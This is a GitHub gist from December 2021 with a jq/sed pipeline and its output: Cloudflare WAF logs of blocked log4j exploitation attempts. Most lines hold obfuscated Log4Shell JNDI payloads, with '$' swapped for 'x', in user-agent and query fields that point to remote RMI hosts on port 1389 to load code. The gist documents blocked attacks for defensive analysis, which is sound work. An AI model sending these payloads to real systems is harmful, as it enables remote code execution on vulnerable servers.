Skip to content

Instantly share code, notes, and snippets.

@centminmod

centminmod/cf-waf-firewall-event-log4j-logs.md Secret

Created December 23, 2021 17:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save centminmod/95d63dc38fc14631f937cbfb4553eed7 to your computer and use it in GitHub Desktop.
Save centminmod/95d63dc38fc14631f937cbfb4553eed7 to your computer and use it in GitHub Desktop.
Download ZIP
Cloudflare WAF Firewall log4j event logs via logpush for past 3 days
Raw
cf-waf-firewall-event-log4j-logs.md 
find /home/cfcmm-fw-logs -type f -name "*.log.gz" -exec pzcat -f {} \; | jq -cn --stream 'fromstream(0|truncate_stream(inputs)) | select(.Action == "block" and (.RuleID == "100514" or .RuleID == "100515" or .RuleID == "100516" or .RuleID == "100517")) | "asn:\(.ClientASN) method:\(.ClientRequestMethod) request:\(.ClientRequestPath)\(.ClientRequestQuery) referer:\(.ClientRefererHost)\(.ClientRefererPath)\(.ClientRefererQuery) ua:\(.ClientRequestUserAgent)"' | sed -e 's|\%24|x|g' -e 's|\$|x|g' | sort | uniq -c | sort -rn | head -n100

3 "asn:14061 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://188.166.57.35:1389/Binary}"
3 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Ax%7Blower%3Ajndi%7D%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://188.166.57.35:1389/Binary}"
2 "asn:8560 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
2 "asn:8560 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
2 "asn:51167 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://167.99.115.242:1389/Binary}"
2 "asn:51167 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://167.99.115.242:1389/Binary}"
2 "asn:44309 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
2 "asn:44309 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
1 "asn:9318 method:GET request:/ referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/#Binary}"
1 "asn:9318 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/#Binary}"
1 "asn:8560 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:8560 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:8560 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:8560 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:8560 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:8560 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:63949 method:GET request:/ referer:51.79.74.227:1389/#Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://51.79.74.227:1389/#Binary}"
1 "asn:63949 method:GET request:/ referer:144.202.34.169:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/Binary}"
1 "asn:63949 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D referer:51.79.74.227:1389/#Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://51.79.74.227:1389/#Binary}"
1 "asn:63949 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D referer:144.202.34.169:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/Binary}"
1 "asn:51167 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:51167 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:4622 method:GET request:/ referer:51.79.74.227:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://51.79.74.227:1389/Binary}"
1 "asn:4622 method:GET request:/ referer:167.99.115.242:1389/#Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/#Binary}"
1 "asn:4622 method:GET request:/?q=x%7Bx%7Blower%3Ajndi%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D referer:51.79.74.227:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://51.79.74.227:1389/Binary}"
1 "asn:4622 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2F%23Binary%7D referer:167.99.115.242:1389/#Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/#Binary}"
1 "asn:45090 method:GET request:/ referer:51.79.74.227:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://51.79.74.227:1389/Binary}"
1 "asn:45090 method:GET request:/?q=x%7Bx%7Blower%3Ajndi%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D referer:51.79.74.227:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://51.79.74.227:1389/Binary}"
1 "asn:271011 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://167.99.115.242:1389/Binary}"
1 "asn:271011 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:271011 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://167.99.115.242:1389/Binary}"
1 "asn:271011 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:24940 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:24940 method:GET request:/ referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://144.202.34.169:1389/Binary}"
1 "asn:24940 method:GET request:/ referer:144.202.34.169:1389/#Binary} ua:x{x{lower:jndi}:x{lower:rmi}://144.202.34.169:1389/#Binary}"
1 "asn:24940 method:GET request:/?q=x%7Bx%7Blower%3Ajndi%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:24940 method:GET request:/?q=x%7Bx%7Blower%3Ajndi%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D referer:144.202.34.169:1389/#Binary} ua:x{x{lower:jndi}:x{lower:rmi}://144.202.34.169:1389/#Binary}"
1 "asn:24940 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://144.202.34.169:1389/Binary}"
1 "asn:200000 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:200000 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
1 "asn:16276 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/?q=x%7Bx%7Blower%3Ax%7Blower%3Ajndi%7D%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://188.166.57.35:1389/Binary}"
1 "asn:16276 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:16276 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{::-j}ndi:rmi://167.99.115.242:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:51.79.74.227:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://51.79.74.227:1389/#Binary}"
1 "asn:14061 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:188.166.57.35:1389/Binary} ua:x{x{::-j}ndi:rmi://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://167.99.115.242:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:167.99.115.242:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/#Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://144.202.34.169:1389/#Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/#Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/Binary} ua:x{x{::-j}ndi:rmi://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/ referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}ndi:rmi://144.202.34.169:1389/#Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Ax%7Blower%3Ajndi%7D%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D referer:144.202.34.169:1389/#Binary} ua:x{x{lower:x{lower:jndi}}:x{lower:rmi}://144.202.34.169:1389/#Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Ajndi%7D%3Ax%7Blower%3Armi%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:jndi}:x{lower:rmi}://167.99.115.242:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D referer:167.99.115.242:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://167.99.115.242:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Bupper%3An%7Dx%7Blower%3Ad%7Dx%7Bupper%3Ai%7D%3Ax%7Blower%3Ar%7Dmx%7Blower%3Ai%7D%7D%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{upper:n}x{lower:d}x{upper:i}:x{lower:r}mx{lower:i}}://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D referer:144.202.34.169:1389/Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D referer:51.79.74.227:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://51.79.74.227:1389/#Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dx%7B%3A%3A-n%7Dx%7B%3A%3A-d%7Dx%7B%3A%3A-i%7D%3Ax%7B%3A%3A-r%7Dx%7B%3A%3A-m%7Dx%7B%3A%3A-i%7D%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}x{::-n}x{::-d}x{::-i}:x{::-r}x{::-m}x{::-i}://144.202.34.169:1389/#Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A1389%2FBinary%7D referer:188.166.57.35:1389/Binary} ua:x{x{::-j}ndi:rmi://188.166.57.35:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D referer:144.202.34.169:1389/Binary} ua:x{x{::-j}ndi:rmi://144.202.34.169:1389/Binary}"
1 "asn:14061 method:GET request:/?q=x%7Bx%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D referer:144.202.34.169:1389/#Binary} ua:x{x{::-j}ndi:rmi://144.202.34.169:1389/#Binary}"
1 "asn:136907 method:GET request:/ referer:51.79.74.227:1389/#Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://51.79.74.227:1389/#Binary}"
1 "asn:136907 method:GET request:/?q=x%7Bx%7Blower%3Aj%7Dx%7Blower%3An%7Dx%7Blower%3Ad%7Di%3Ax%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D referer:51.79.74.227:1389/#Binary} ua:x{x{lower:j}x{lower:n}x{lower:d}i:x{lower:rmi}://51.79.74.227:1389/#Binary}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment